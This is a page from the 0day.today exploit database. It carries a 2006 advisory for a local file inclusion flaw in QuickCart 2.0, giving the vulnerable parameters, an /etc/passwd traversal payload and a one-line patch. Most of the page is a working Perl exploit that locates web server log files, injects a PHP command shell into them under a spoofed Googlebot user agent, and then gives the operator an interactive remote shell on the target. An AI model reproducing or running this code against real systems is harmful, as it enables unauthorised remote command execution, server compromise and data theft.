0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
QuickCart 2.0 (categories.php) Local File Inclusion Exploit
[===========================================================
QuickCart 2.0 (categories.php) Local File Inclusion Exploit
===========================================================
#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# #
# QuickCart 2.0 Local File Inclusion Exploit #
#################################################################################################
# Software: QuickCart 2.0 #
# #
# Vendor: http://opensolution.org/ #
# #
# Released: 2006/12/03 #
# #
# Critical: Moderately crtical #
# #
# Note: The information provided in this document is for Quick Cart administrator #
# testing purposes only! #
# #
# register_globals must be on #
# gpc_magic_quotes must be off #
# #
# actions_admin/categories.php?config[db_type]= #
# actions_admin/couriers.php?config[db_type]= #
# actions_admin/orders.php?config[db_type]= #
# actions_admin/products.php?config[db_type]= #
# actions_client/products.php?config[db_type]= #
# actions_client/orders.php?config[db_type]= #
# #
# Vulnerable code: #
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php'; #
# #
# Patch: (Place this code at the top of every file) #
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) #
# die(); #
# #
# Exploit: categories.php?config[db_type]=../../../../../../../../../../../etc/passwd%00 #
# Usage: perl localfilexpl.pl 127.0.0.1 actions_admin/categories.php?config[db_type]= #
#################################################################################################
############################################################################
# Local File Inclusion Exploiter #
# #
# This script attempts to exploit a local file include vulnerability #
# by finding a readable http log file, then by sending a specially crafted #
# http request to the server in order to insert a PHP Shell into the #
# log files. A shell is then spawned. #
# #
# Created By r0ut3r (writ3r [at] gmail.com) #
############################################################################
use IO::Socket;
use Switch;
$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$vulnf = @ARGV[1]; # /include/WBmap.php?l=
$opt = @ARGV[2]; # -p (not needed)
sub Header()
{
print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at]
gmail.com)
-------------------------------------------------------------------
};
}
sub Usage()
{
print q {Usage: localfilexpl.pl [target] [folder & vulnerable file]
[opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print recieved content)
};
exit();
}
Header();
if (!$target || !$vulnf) {
Usage(); }
@targets = (
"var/log/httpd/access_log",
"var/log/httpd/error_log",
"var/log/access_log",
"var/log/error_log",
"var/www/logs/access.log",
"var/www/logs/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"apache/logs/access_log",
"apache/logs/error.log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/error.log",
"etc/httpd/logs/error_log",
"usr/local/apache/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/error.log",
"usr/local/apache/logs/error_log",
"var/log/apache2/error_log",
"var/log/apache2/error.log",
"var/log/apache2/access_log",
"var/log/apache2/access.log",
"access_log",
);
@paths = ();
$dirs = 5;
$count = 0;
foreach $target (@targets)
{
for(0..$dirs){
$paths[$count+$_] = "../"x$_ . $target;
}
$count += $dirs;
}
print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
#print "$path\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $sock "GET ".$vulnf.$path."%00 HTTP/1.1\n";
print $sock "Host: $target\n";
print $sock "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: close\n\n\r\n";
while (<$sock>)
{
if (/<title>404 Not Found/)
{
print "[-] Vulnerable file not found! Exiting... \n";
exit();
}
if (/Permission denied/) {
print "[-] Log file found, but permission was denied
to read file. [".$path."] \n"; }
if (/(.*?).(.*?).(.*?).(.*?) - - \[(.*?)/)
{
if ($path ne $log) {
print "[+] Log file found! [".$path."] \n"; }
$log = $path;
}
}
}
if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }
$cmdfunct = "system";
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo
".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort =>
$port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
@cmdfunctions = ("exec", "shell_exec", "passthru");
$enabled_funct = false;
$xpl_test = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl_test "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_test "Host: $target\n";
print $xpl_test "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $xpl_test "Accept: text/html\n";
print $xpl_test "Connection: close\n\n\r\n";
while (<$xpl_test>)
{
if (/system\(\) has been disabled for security/)
{
print "[-] system() function is disabled. \n";
foreach $cmdfunct (@cmdfunctions)
{
if ($enabled_funct eq false)
{
print "[+] Trying ".$cmdfunct."()\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
$xpl_retry = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
print $xpl_retry "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_retry "Host: $target\n";
print $xpl_retry "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl_retry "Accept: text/html\n";
print $xpl_retry "Connection: close\n\n\r\n";
while (<$xpl_retry>)
{
if (/b>: $cmdfunct\(\) has been disabled for security reasons/)
{
print "[-] ".$cmdfunct."() function is disabled. \n";
$enabled_funct = false;
last;
}
else
{
$enabled_funct = true;
}
}
if ($enabled_funct eq true)
{
print "[+] Enabled function found! [".$cmdfunct."]\n";
break;
}
}
}
if ($enabled_funct eq false) {
print "[-] No enabled cmd function found. Tried system(),
exec(), shell_exec(), passthru()\n"; exit(); }
}
}
print "[!] Command execution at: http://".$target.$vulnf.$log."%00\n";
print "[+] Creating shell - Type 'exit' to quit\n";
print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
while ($cmd !~ "exit")
{
$scmd = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $scmd "GET ".$vulnf.$path.$log."%00&cmd=".substr($cmd, 0, -1)."
HTTP/1.1\n";
print $scmd "Host: $target\n";
print $scmd "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $scmd "Accept: text/html\n";
print $scmd "Connection: close\n\n\r\n";
# prints output from command execution
if ($opt eq "-p")
{
while (<$scmd>)
{
print <$scmd>;
}
}
print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
}
# 0day.today [2024-11-16] #